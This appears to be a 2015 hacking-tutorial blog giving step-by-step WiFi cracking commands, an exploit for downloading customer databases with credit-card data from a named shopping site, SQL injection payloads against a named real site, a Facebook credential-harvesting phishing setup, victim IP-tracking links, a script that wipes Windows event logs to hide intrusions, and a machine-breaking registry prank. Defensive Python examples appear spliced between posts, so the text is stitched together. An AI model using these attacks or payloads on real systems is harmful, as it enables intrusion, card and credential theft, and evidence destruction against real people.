Tuesday, 14 July 2015

How To Hack WPA or WPA2 WiFi Security Fully Explained

12:44 pm
Compared to WEP WiFi hacking, explained in our previous tutorial, WPA/WPA2 is much harder and more time consuming because of its stronger security. Cracking the password sometimes depends on your luck, and success is not guaranteed.

..:: How to launch a Dictionary Attack on WPA Handshake ::..

You might get lucky and your nearest WiFi password may be based on a common dictionary word or number sequence. In such a case, you may succeed with a dictionary attack.

Step 1: Enable monitor mode on the wireless interface

#airmon-ng start wlan0

This will start monitor mode.

Step 2: Take note of the nearest WiFi networks.

#airodump-ng mon0

Step 3: Take note of the channel of your target network, then dump packets from that channel and save them to a local capture file.

#airodump-ng -c6 mon0 -w capture_file

Step 4: Wait for the WPA handshake capture

At this point you can use 'aireplay-ng' to de-authenticate an associated legitimate client from the network. The point is that the client will re-authenticate shortly afterwards, so we capture the handshake without having to wait too long:

#aireplay-ng --deauth 0 -a <AP_MAC> -c <CLIENT_MAC> mon0

If you don't know the MAC of any associated client, simply broadcast a deauth to all clients:

#aireplay-ng --deauth 0 -a <AP_MAC> mon0

Step 5: After you grab a WPA handshake comes the hard part: brute forcing it with a dictionary. Use 'aircrack-ng' for this:

#aircrack-ng capture_file-01.cap -w listfile.lst

Now say your prayers and hope the passphrase is present in the dictionary you chose.

You can also use an online distributed WPA/WPA2 handshake cracking tool on this website:

Note that if the Access Point has WPS enabled, it becomes easier to recover the WPA/WPA2 passphrase, as only about 11,000 attempts are needed to brute force the WPS PIN due to an implementation flaw.

Another tool, 'Reaver', can be used for WPA cracking if WPS is enabled.

Here's sample usage of reaver:

#reaver -i mon1 -a 94:D7:23:48:BE:78 -vv -c8

  • -i is the interface
  • -a "94..." is the BSSID of the hotspot
  • -vv enables verbose mode
  • -c specifies the channel
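The reason the dictionary step above is slow, and the reason a strong passphrase defeats it, is the key derivation WPA/WPA2-PSK uses. The following is an added example (not code from the original post or from the aircrack-ng project) that derives the PMK exactly as the standard does and runs a simple passphrase policy check; the wordlist, the sample passphrases and the helper names are assumptions, and the known-answer value is the public IEEE 802.11i Annex H test vector.

```python
import hashlib
import string

# IEEE 802.11i-2004 Annex H test vector (not from the page): PMK for
# passphrase "password" on SSID "IEEE".
KNOWN_PMK_HEX = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"

# Constructed wordlist standing in for the "listfile.lst" of the post.
WORDLIST = {"password", "sunshine", "qwerty123"}


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).

    This is the entire per-guess cost of an offline attack on a captured
    handshake: 4096 HMAC-SHA1 rounds, fixed by the standard. Nothing on the
    AP side can raise it, so passphrase entropy is the only defence. The
    SSID acts as the salt, which is why precomputed tables are per-SSID.
    """
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8..63 printable ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), 4096, 32)


def passphrase_problems(passphrase: str, wordlist: set) -> list:
    """Return the reasons a passphrase would fall to the dictionary attack
    described in the post (empty list means none of these cheap checks fired)."""
    problems = []
    if not 8 <= len(passphrase) <= 63:
        problems.append("length outside 8..63")
    # WPA allows printable ASCII 32..126; string.printable also contains
    # control/whitespace characters, which we exclude explicitly.
    if not all(c in string.printable and c not in "\t\n\r\x0b\x0c" for c in passphrase):
        problems.append("non-ASCII or control characters")
    if passphrase.isdigit():
        problems.append("all digits (phone numbers, dates: tiny search space)")
    low = passphrase.lower()
    if low in wordlist:
        problems.append("plain dictionary word")
    stripped = low.rstrip("0123456789!")
    if stripped != low and stripped in wordlist:
        problems.append("dictionary word plus a numeric/punctuation suffix")
    return problems


if __name__ == "__main__":
    print(derive_pmk("password", "IEEE").hex() == KNOWN_PMK_HEX)
    for candidate in ("9212173318", "sunshine123!", "correct horse battery staple"):
        print(candidate, passphrase_problems(candidate, WORDLIST) or "ok")
```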

Disclaimer: This is for experimentation or authorized penetration testing purposes only.

Tutorial by : Pranshu

How To Hack WEP WiFi Security Fully Explained

11:48 am
Hello Friends, today we are going to learn how to hack a WEP-protected WiFi network by cracking its password.

WiFi security mostly means WEP, WPA or WPA2-PSK. Of these, WEP is the weakest and the easiest to hack, while WPA and WPA2 use stronger encryption. In this tutorial we will cover WEP hacking.

Things required -> BackTrack or Kali Linux

..:: WEP Cracking ::..

No doubt WEP is the easiest to crack. Here's how to crack WEP:

Step 1: First we need to start monitor mode. Many people may face a "no interface" issue when giving the airmon-ng command; see the solution here -> http://sh.st/cXO1I

#airmon-ng start wlan0

Notice that monitor mode is enabled on mon1 on wlan0; take note of this. We will need this interface later on.

Step 2: Now start dumping data packets with airodump:

#airodump-ng mon1

You'll see all the WiFi networks available in your area. Here we see different security types, like WEP, WPA and WPA2. We are going to go for the WEP one.

Also, it is important to note the other information here, as it determines how easily you get into the WiFi:
  • The BSSID is the MAC address of the WiFi network.
  • PWR tells you the signal strength.
  • Beacons are frames sent by the hotspot to indicate its presence.
  • Data is the count of data packets, which are what we are interested in. The more data packets we have, the more certain we are to crack the hotspot.
  • CH tells you the channel used by the hotspot.
So I use airodump to focus on dumping packets from this particular BSSID and store them in a file:

#airodump-ng -w wap -c 8 --bssid 14:D6:4D:A6:F6:69 mon1

-w specifies the file prefix to write to, -c specifies the channel, and you know what --bssid is for.

Now packet capture starts, and we play the waiting game. Wait to collect enough packets before trying to crack the password. Usually we wait till we grab around 20000 packets.

How long this takes depends on the traffic flow on that BSSID and your distance from the BSSID.

STEP 3: If it is taking too long to grab the required number of packets, you can use aireplay:

#aireplay-ng -b 14:D6:4D:A6:F6:69 -h 00:11:22:33:44:55 mon1

-b specifies the BSSID

-h specifies your own hardware (MAC) address

aireplay-ng will start generating bogus traffic so that you can grab enough data packets quickly.

STEP 4: Now that we have enough data packets (42445), we can start cracking the password.

#aircrack-ng wap-02.cap

wap-02.cap is the file in which the captured packets were saved (airodump-ng appends a sequence number to the prefix given with -w):

Now you just need to wait for some time and aircrack-ng will give you the cracked password:

So as we can see, the password is 9212173318. It seems to be someone's cell phone number. I traced its location and it's based in Delhi. Using personal information as a password is bad practice.
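Why does WEP fall to nothing more than collecting packets, and why does aireplay-ng's bogus traffic help? WEP encrypts every frame with RC4 keyed by a 24-bit IV (sent in clear) prepended to the shared key, so any two frames that reuse an IV share a keystream. The following is an added example, not code from the original post or from aircrack-ng, that shows the keystream-reuse weakness on constructed frames; the WEP key, IV and plaintexts are made up for the demonstration, and the RC4 known-answer value is the public "Key"/"Plaintext" test vector.

```python
import math


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (KSA + PRGA). WEP uses it with key = IV || shared key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(iv: bytes, wep_key: bytes, plaintext: bytes) -> bytes:
    """WEP frame body without the ICV: 3-byte IV in clear, then payload XOR RC4(IV||key)."""
    if len(iv) != 3:
        raise ValueError("WEP IV is 24 bits")
    return iv + xor(plaintext, rc4_keystream(iv + wep_key, len(plaintext)))


def recover_with_known_plaintext(frame_known: bytes, known_plain: bytes,
                                 frame_other: bytes) -> bytes:
    """Two frames with the same IV share a keystream. Knowing one plaintext
    (ARP requests have a fixed, predictable header, which is why replaying
    them is so effective) reveals the other frame's plaintext with no key."""
    if frame_known[:3] != frame_other[:3]:
        raise ValueError("IVs differ; keystreams are independent")
    keystream = xor(frame_known[3:], known_plain)
    return xor(frame_other[3:], keystream)


def iv_reuse_probability(frames: int, iv_bits: int = 24) -> float:
    """Birthday bound: probability that at least one IV repeats among
    `frames` randomly chosen IVs. Real cards often used sequential IVs that
    restart at 0 after a reset, which makes reuse even more likely."""
    return 1.0 - math.exp(-(frames * (frames - 1)) / (2.0 * 2 ** iv_bits))


# Constructed demo values (not from the page).
DEMO_KEY = bytes.fromhex("0102030405")      # a made-up 40-bit WEP key
DEMO_IV = b"\x00\x00\x01"
DEMO_ARP = b"ARP request"                   # "known" plaintext, 11 bytes
DEMO_SECRET = b"secret data"                # victim plaintext, 11 bytes

if __name__ == "__main__":
    c1 = wep_encrypt(DEMO_IV, DEMO_KEY, DEMO_ARP)
    c2 = wep_encrypt(DEMO_IV, DEMO_KEY, DEMO_SECRET)
    print(recover_with_known_plaintext(c1, DEMO_ARP, c2))
    print("P(IV reuse) after 20000 frames: %.4f" % iv_reuse_probability(20000))
```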

Hope you all enjoyed the tutorial. Any queries, comment below or visit us at https://www.facebook.com/kiithackers

Credits > Pranshu

Resolution Airmon-ng showing No Interface

10:35 am
Today we are going to show you a solution for the most common error people face while running airmon-ng, i.e. no interface is shown, as below:

So how do we fix this issue?

Step 1: Before starting, make sure that you have an Internet connection on your BackTrack or Kali Linux machine. If you are using a VM, make sure your VM network adapter is bridged with the physical network.

Step 2: Next click here: http://linuxwireless.org/download/compat-wireless-2.6/ and download the compat-wireless-2010-06-26-p.tar.bz2 file on your BackTrack or Kali machine.

Step 3: After downloading we have to extract the file, since it is a compressed archive (*.tar.bz2). Go to the directory where you saved the file and give the command:

tar -jxvf compat-wireless-2010-06-26-p.tar.bz2

Step 4: After extracting, go to the folder created by the extraction and give the commands make unload and then make load (to load the new driver). Now you will be able to see the interface.

Check out the video for more clarification:

Feel free to comment below your queries.

Friday, 5 June 2015

How to hack VP-ASP Shopping websites and get all the Database details

12:05 pm
Hello Friends, today we are going to learn how to hack the VP-ASP cart of a shopping website and download its whole database, with customer details, credit card details, product details, etc.

Some basic ideas before starting the tutorial:

What are we going to do here?

First we will hack a shopadmin website, then we will download the database file, which is an *.mdb file. This database file contains all the client details, such as credit card information, and also login names and passwords.

How to do this?

Note: This tutorial was tested on "VP-ASP Shopping Cart Version: 5.00"

Step 1: The first thing to do is to find VP-ASP 5.00 sites. To do this, go to Google.com and type "VP-ASP Shopping Cart 5.00" (without quotes). See the image for reference.

Step 2: In this tutorial we are going to target www.surfstats.com. You can also select any website that has "shopdisplaycategories.asp" or "shopadmin.asp" at the end of its URL. Since surfstats has "shopdisplaycategories.asp" at the end of the URL, we will target it.

Now let's go to the exploit.

The exploit is: diag_dbtest.asp

Step 3: A page will appear containing xDatabase, xDBLocation, xEmail, etc. See the image below.

Step 4: The most important item here is "xDatabase". Its value varies between websites; for some it will be "shopping140", "shopping500" or "shopping550".

For us, xDatabase=shopping500

So all we have to do is add the xDatabase name to the URL along with the .mdb extension, i.e.
"http://www.surfstats.com/eCommerce/vpasp/shopping500.mdb", and press Enter. It will download the database file to your local machine.

If the database file does not download, then

put the database location (xDBLocation) before the shopping*.mdb filename, for example: "http://www.victim.com/[Dblocation]/shopping500.mdb"

Step 5: Download the *.mdb file; you should be able to open it with any mdb file viewer, such as Microsoft Office Access.

Inside the file you will be able to find credit card details, and if you are lucky enough you may get customers' usernames and passwords, etc.

Step 6: The admin login page is usually located at http://www.victim.com/*/shopadmin.asp; for us it's:

If you are not able to find the admin username and password in the *.mdb file, or if they are incorrect, then find the admin login page and try the default credentials, like:

Username : admin   
Password : admin

Username : vpasp    
Password : vpasp

Hope you all like the tutorial; help us spread knowledge, because it's FREE. Share it!!

For any queries, comment below.

Note: Hacking a website is an illegal act. This is only an informational post and I am not responsible for any actions taken after reading this tutorial. This post is for educational purposes only.

Sunday, 17 May 2015

How to make your SmartPhone work as Mouse and Keyboard

12:36 pm
Hello friends, today we will learn how to make our smartphone work as a mouse and keyboard remotely. We can also do the following with it:

1. Manage your system drives
2. Play music on the system
3. Restart, log off, shut down and lock the system remotely
4. Control YouTube, VLC media player, etc.

Okay, so let's begin. For this you will require:

Step 1: Download the Unified Remote Server file from the link provided above and install it.

Step 2: While installing it, remember to check the "Windows Firewall Exception". After installing, double click on the Unified Remote Server icon. It will look like this:

If you want to see everything we can do remotely, check the Remotes tab.

Step 3: Now that our server is up, we are ready to connect the app. Download the "Unified Remote App" from the link provided above and install it on your Android/Windows smartphone.

Step 4: After installing the app, you will only see a blank white screen. Click on the Options button beside Remote, and you will see options like these:

Step 5: Now click on Servers. There is a "+" symbol at the top left corner (here we are configuring the connection between the application and the server manually). Next give a display name (for me it is KIIT Hackers). Host IP will be the IP of my machine (it can be the LAN IP or the WAN IP; both will work). To find the IP, click on "WAN Detected" as shown in the image:

Step 6: Just enter the IP shown above as the Host IP in the app and save it (don't modify anything else).

Step 7: That's it, we are done and ready to go. Just go to Remotes and select what you want to do. Hope you all like the tutorial. Any queries, comment below.

Wednesday, 29 April 2015

How to clear all the Event Logs with just a Click

9:27 am
Hello Friends, today we are going to learn how to clear all the event logs with a few clicks. Before that, let's understand what event logs are and how we can view them.

What are Event Logs?

According to Microsoft, event logs are special files that record significant events on your computer, such as when a user logs on to the computer or when a program encounters an error. Whenever these types of events occur, Windows records the event in an event log that you can read using Event Viewer.

How to view them?

Go to the Run prompt (WINDOWS + R) -> type "eventvwr" -> Enter. Now you will see the Event Viewer console. This is where Windows stores all the event logs of your computer.

Now the main question is: why clear all these logs?

Whether you gain unauthorized access to a machine or run your own virus on it, everything is recorded in the form of logs. So people can go through these logs at any time and easily understand what happened.
So there is a need to learn how to clear all the logs.

Steps to clear Event Logs:

Step 1: Open Notepad, copy and paste the text below, and save the file as "somename.bat".
@echo off
REM Admin check: bcdedit prints "Access is denied" when not elevated
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
REM Enumerate every log name with "wevtutil el" and clear each one.
REM Note: clearing the Security log itself writes event ID 1102 ("The audit log was cleared").
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo Event Logs have been cleared! ^<press any key^>
goto theEnd
:do_clear
echo clearing %1
wevtutil.exe cl %1
goto :eof
:noAdmin
echo You must run this script as an Administrator!
echo ^<press any key^>
:theEnd
pause >NUL

Step 2: That's it, we are done. Now right click on the .bat file and choose "Run as Administrator". Whenever you run the .bat file it will clear the logs, as shown in the image.

>_ Hope you all enjoyed today's trick. Any doubt related to the code, just message us in the comments.
Note: Microsoft doesn't recommend deleting logs, so only do this in extreme cases.

Monday, 23 February 2015

How to Find which USB devices were Plugged in your system

2:46 pm
Hello guys, once again we are back with another interesting trick. Imagine you are running a company where you have disabled USB access for your employees. But since there are many clever people, they will always try to connect some USB device or other.

So today we are going to show you a way to know which USB devices have been plugged into a specific system.

Using the Registry Editor:

STEP 1: Press "WINDOWS + R" to open the Run prompt -> type "regedit.exe" and press Enter
STEP 2: Now you are in the Registry Editor -> expand HKEY_LOCAL_MACHINE -> SYSTEM -> CurrentControlSet -> Enum -> USBSTOR
STEP 3: That's it. You can see the list of USB storage devices that have been connected to that system (here we connected a Samsung mobile).

Using PowerShell:

STEP 1: Press "WINDOWS + R" to open the Run prompt -> type "powershell" and press Enter
STEP 2: Now type the following command: Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Enum\USBSTOR\*\* | Select FriendlyName

Any queries, comment below.

Thursday, 19 February 2015

Hacking Facebook or any Email Account using the IP Tabnapping Method

4:18 pm
Hi guys, today we are going to learn how to hack Facebook or email accounts using the IP Tabnapping method. IP Tabnapping is similar to phishing, but instead of using a web hosting site we use our own system's IP address to get the email id and password. For this you will require:

1. BackTrack OS (we are using BackTrack 5 R2; download it from www.backtrack-linux.org)
2. Some social engineering tricks + brain (the most important thing)

Okay, so let's begin:

Step 1: Open BackTrack, click on Applications > BackTrack > Exploitation Tools > Social Engineering Tools > Social Engineering Toolkit > set

Step 2: Now you are in the SET console. You can see several options there, like Social-Engineering Attacks, Fast-Track Penetration Testing, etc. Just type 1 and press Enter. This opens "Social-Engineering Attacks".

Step 3: Another menu will appear; type "2", i.e. Website Attack Vectors.

Step 4: Another menu will appear; type "3", i.e. Credential Harvester Attack Method.

Step 5: Now you get 3 options: Web Templates, Site Cloner, Custom Import. Type "2", i.e. Site Cloner.

Step 6: Now it will ask for your IP address. To find your IP address in BackTrack, open a terminal and type "ifconfig". You can see your IP address there; check the image below for more details. After getting the IP, enter it in SET and press Enter.

Step 7: Now it will ask for the URL to clone. Here you type the URL you want to target, like Facebook, Gmail, Yahoo, Hotmail, Twitter, etc. We are using www.facebook.com.

Step 8: Wait a few moments till the cloning is over. When the cloning is done you are ready.

Just use your brain to convince people to open your IP address (mentioned above), or you can also use URL shorteners or convert the IP to hexadecimal form so that no one notices.

When they open the IP address they will get the page shown in the image, and as they input their email id and password, it will be shown in your SET console.

That's it; this process is called IP Tabnapping. Hope you guys will remember it next time. Phishing is much the same; the only difference is that in phishing we have to copy the whole source to make a new Facebook login page and change the form's action value to redirect it to our own page.

Any query regarding this, comment below.

How to Bypass SMS Verification sent by any Email Provider

3:38 pm

Most websites ask you to enter your phone number for verification. Sometimes you don't want to give it for privacy reasons. Even when we register on websites like Gmail, Yahoo, Hotmail, Rediffmail, etc., they ask for SMS verification. So today we will learn how to bypass this SMS verification using an external number.

For this method you can use the website mentioned below:

So how does it work? These websites provide you with some numbers. For example, we are using http://receive-sms-online.com/; in the image below you can see it providing some numbers. We will use one of these numbers to verify our account.

Now give any of these numbers where it asks for a number. For the verification, click on the number you gave and refresh the page. You will get your code as shown in the image below:

For any clarification, do comment below.

CREDITS :- Amar Helloween & KIIT Hackers Team

How to find Someone's IP & Location details in just 1 minute

2:56 pm
Hello guys, today I'm going to show you "How to find the IP address and geographical location of someone in just 1 minute", easy and quick. This method is 100% working and accurate as tested by me, so no useless comments!

So let's start:

Step 1 : Go to this website : http://www.whatstheirip.com/
Step 2: Enter your email id and click Get Link. See the image for details.

Step 3: You'll see 2 links. Copy either one of the links and send it to your victim and make him open it, saying "check out my new pic" or something like that (don't open it yourself).

Step 4: Check the inbox of the email you provided in step 2. You'll see a mail with an IP address. You got his IP and geolocation!!

When your victim or friend opens that link he'll see an error page and think it's a random error.

Hope you guys like this trick. Do comment if you have any problem with the above steps.

Credits :- Amar Helloween, Haxor Nitrox & KIIT Hackers

How to hack websites using Manual SQL injection

2:43 pm
Hello Friends, today we are going to learn how to hack a website using manual SQL injection.
The website we will be using in this demo is: www.unitedpurpose.org/

So, here is the vulnerable link: www.unitedpurpose.org/archive/article.php?id='100

So let's begin:

Step 1: First we have to find the number of columns in the vulnerable query. To do that we use the "order by" clause on the vulnerable URL. Example:

http://www.unitedpurpose.org/archive/article.php?id=100 order by 7 (any number; you have to guess it. I am using 13)

*Remember, if you get an error with "order by 7" that means the query has fewer than 7 columns; if you get the same page, the number of columns is at least 7. In my case the number of columns is 13.

Step 2: After getting the column count, it's time to find the vulnerable (displayed) column by using "UNION SELECT" with the column numbers one after another, separated by commas (,). See the example for more clarification:

Example : http://www.unitedpurpose.org/archive/article.php?id=-100%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13--

Step 3: In my case I got 4 and 7 as vulnerable columns (we will use column 4). We can inject our queries in column 4: for the version add @@version, for the database name add database().

http://www.unitedpurpose.org/archive/article.php?id=-100 UNION SELECT 1,2,3,@@version,5,6,7,8,9,10,11,12,13-- (for getting the version)

http://www.unitedpurpose.org/archive/article.php?id=-100 UNION SELECT 1,2,3,database(),5,6,7,8,9,10,11,12,13-- (for getting the database)

Step 4: Now that we have the version as well as the database name, it's time to search for the tables. For that we replace the 4 with group_concat(table_name) and add from information_schema.tables where table_schema=database(). Example:

http://www.unitedpurpose.org/archive/article.php?id=-100 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13 from information_schema.tables where table_schema=database()--

Step 5: Now it's time to get the columns of the users table; we need the table name encoded with MySQL's CHAR() for this. Replace table_name with column_name and use from information_schema.columns where table_name=CHAR(...). Just look for user and pass columns. Example:

http://www.unitedpurpose.org/archive/article.php?id=-100 UNION SELECT 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13 from information_schema.columns where table_name=CHAR(109, 101, 109, 98, 101, 114, 115, 104, 105, 112)--

Step 6: The final step is to get the username and password from the columns, here email and pass. We remove everything from information_schema onward and add group_concat(user,0x3a,pass) from the users table. Example; just replace email and phone with your admin and password columns. You will get the password as an MD5 hash, which then has to be cracked.

http://www.unitedpurpose.org/archive/article.php?id=-100 UNION SELECT 1,2,3,group_concat(email,0x3a,phone),5,6,7,8,9,10,11,12,13 from membership--
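The bug that makes every step above work is the same one: article.php pastes the id parameter straight into its SQL. The following is an added example, not code from the original post or from the site discussed, that rebuilds that pattern on an in-memory SQLite database beside the parameterised fix, and adds a small log-side check for the probes the post uses; the table layout, rows and helper names are constructed for the demonstration.

```python
import sqlite3
from urllib.parse import unquote_plus


def build_demo_db() -> sqlite3.Connection:
    """Constructed stand-in for the article.php backend (SQLite, in memory)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE membership (email TEXT, pass TEXT);
        INSERT INTO article VALUES (100, 'Welcome', 'First article');
        INSERT INTO membership VALUES ('admin@example.test',
                                      '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn


def fetch_article_vulnerable(conn: sqlite3.Connection, article_id: str) -> list:
    """Untrusted input concatenated into SQL: the defect behind article.php?id=
    An "order by N" probe raises an error once N exceeds the column count, and
    "-100 UNION SELECT ..." with matching column count returns attacker-chosen rows."""
    sql = "SELECT id, title, body FROM article WHERE id=" + article_id
    return conn.execute(sql).fetchall()


def fetch_article_safe(conn: sqlite3.Connection, article_id: str) -> list:
    """Fix 1: validate the id is an integer. Fix 2: bind it as a parameter,
    so the driver never interprets the value as SQL. Either alone closes the
    hole shown in the post; together they fail closed on any surprise."""
    try:
        num = int(article_id)
    except ValueError:
        return []
    return conn.execute("SELECT id, title, body FROM article WHERE id=?",
                        (num,)).fetchall()


def looks_like_sqli_probe(raw_value: str) -> bool:
    """Cheap detection for web-log review: URL-decode the parameter and look
    for the markers every probe in the post relies on. False positives are
    possible on free-text fields; for a numeric id they should be zero."""
    low = " ".join(unquote_plus(raw_value).lower().split())
    markers = ("union select", "order by", "--", "information_schema", "@@version")
    return any(m in low for m in markers)


if __name__ == "__main__":
    db = build_demo_db()
    probe = "-100 UNION SELECT 1,email,pass FROM membership--"
    print("vulnerable:", fetch_article_vulnerable(db, probe))
    print("safe      :", fetch_article_safe(db, probe))
    print("flagged   :", looks_like_sqli_probe("-100%20UNION%20SELECT%201,2,3--"))
```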

# Any problem in understanding or execution, do comment below.

Changing File formats of your Friends Machine

2:22 pm
Hello guys, today we are going to teach you a very simple but very dangerous trick which you can try out on your friend's system :P

>_ What are we going to do: We will change some important file type associations (exe, cpl, bat, msc, mp3, mp4, flv or any other of your choice) to the txt type.

>_ What will happen: Whenever your friend opens any file with the above extensions, for example an mp4 video, it will open in Notepad and they will never be able to play it.

So let's get started:

Step 1: We need access to your victim's/friend's machine for at least 10 minutes.

Step 2: Type regedit.exe in the Run prompt of the victim's machine.

Step 3: Now you are in the Registry Editor -> click on "HKEY_CLASSES_ROOT" and search for the extension you want to change. Here we are changing executable files (.exe) to text files (.txt). Similarly you can change others of your own choice.

Step 4: Click on the file extension (.exe) -> on the right side there is "(Default)" -> right click, Modify -> it will say exefile; change it to txtfile. Similarly, if you are changing mp3, change mp3file to txtfile. Click OK and we are done.

Step 5: Now try to open any .exe file (here I tried opening Snipping Tool); it will open as a text file (Notepad). Enjoy!!!


Since we changed .exe to .txt, regedit, command prompt and every other application will now refuse to open. Gone case, right :P

There are 2 ways to recover it:

(a) Create a batch file (a file with extension .bat) and write regedit.exe inside it. Double click on it and your Registry Editor will open again; now you can change the association back.

(b) The second option is opening the MMC console. Type MMC in search and double click; your MMC console will open -> click on File -> Add Snap-ins.

Any doubts, ask below in the comments:

Credits :- Amar Helloween & KIIT Hackers Team
